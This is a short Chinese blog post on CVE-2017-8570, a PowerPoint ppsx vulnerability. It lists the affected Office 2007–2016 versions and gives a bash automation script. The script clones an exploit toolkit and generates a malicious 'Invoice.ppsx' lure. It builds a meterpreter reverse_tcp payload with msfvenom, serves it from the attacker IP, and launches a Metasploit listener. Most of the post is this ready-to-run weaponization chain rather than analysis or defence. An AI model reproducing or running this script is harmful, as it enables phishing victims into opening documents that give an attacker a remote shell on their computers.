CVE-2017-8570是一个PowerPoint演示文稿的漏洞,利用方法简单且危害较大。攻击者只需要将生成的恶意ppsx(ppsx是office2007版以后的演示文稿的保存格式)文档发送给用户,用户打开放映后就会中招。
影响版本
影响范围:
Microsoft Office 2007 Service Pack 3
Microsoft Office 2010 Service Pack 2 (32-bit editions)
Microsoft Office 2010 Service Pack 2 (64-bit editions)
Microsoft Office 2013 RT Service Pack 1
Microsoft Office 2013 Service Pack 1 (32-bit editions)
Microsoft Office 2013 Service Pack 1 (64-bit editions)
Microsoft Office 2016 (32-bit edition)
Microsoft Office 2016 (64-bit edition)
自动化脚本
attack_ip="192.168.1.212" LPORT="6666" DIR="/var/cve2017" if [ -d ${DIR} ]; then rm -rf ${DIR} mkdir ${DIR} else mkdir ${DIR} fi cd $DIR `git clone https://github.com/tezukanice/Office8570.git` cd Office8570 mkdir template mv template.ppsx template/template.ppsx python cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u http://$attack_ip"/logo.doc" `msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=${attack_ip} LPORT=${LPORT} -f exe > ${DIR}/shell.exe` gnome-terminal -e "python cve-2017-8570_toolkit.py -M exp -e http://${attack_ip}/shell.exe -l ${DIR}/shell.exe" `service postgresql start` if [ -f "exp.rc" ]; then rm "exp.rc" fi echo "use exploit/multi/handler">>exp.rc echo "set LHOST "$attack_ip>>exp.rc echo "set LPORT "$LPORT>>exp.rc echo "set PAYLOAD windows/x64/meterpreter/reverse_tcp">>exp.rc echo "exploit">>exp.rc gnome-terminal -e "msfconsole -r exp.rc"
参考链接
原创文章,作者:Y4er,未经授权禁止转载!如若转载,请联系作者:Y4er